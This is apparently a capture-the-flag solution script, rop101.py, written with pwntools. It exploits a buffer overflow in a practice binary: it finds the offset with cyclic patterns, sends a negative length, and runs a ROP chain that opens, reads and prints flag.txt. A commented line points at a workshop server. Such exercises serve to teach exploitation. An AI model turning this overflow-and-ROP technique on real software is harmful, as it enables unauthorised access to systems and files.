rop101.py

from pwn import *
context.log_level = 'debug'

# Use the following to get the buffer overflow offset.
# Using cyclic, make crash the program on a specific value.
# From gdb, doing `x $esp` gives 0x6b61616a.
# cyclic_find(0x6b61616a) == 1036

#p = process("./rop101")
#gdb.attach(p)
#p.recvuntil("quit\n")
#p.sendline("1")
#p.recvuntil(": ")
#p.sendline("-1")
#p.sendline(cyclic(3000))
#p.recvuntil("quit\n")
#p.sendline("4")
#p.recvall()
#import sys;sys.exit()

elf = ELF('./rop101')
padding = cyclic_find(0x6b61616a)

cave = elf.bss()
target = './flag.txt\x00'
rop = ROP(elf)
rop.read(0, cave, len(target))
rop.open(cave, 0)
rop.read(3, cave, 0x100)
rop.write(1, cave, 0x100)
rop.raw(0)
print(rop.dump())

payload = 'A' * padding + str(rop)

#s = remote('workshop.dciets.com', 8002)
s = process("./rop101")
s.recvuntil("quit\n")
s.sendline("1")
s.recvuntil(": ")
s.sendline("-1")
s.sendline(payload)
s.recvuntil("quit\n")
s.sendline("4")
s.recvuntil("kthxbye\n")

s.send(target)

print("Flag: %s" % s.recv())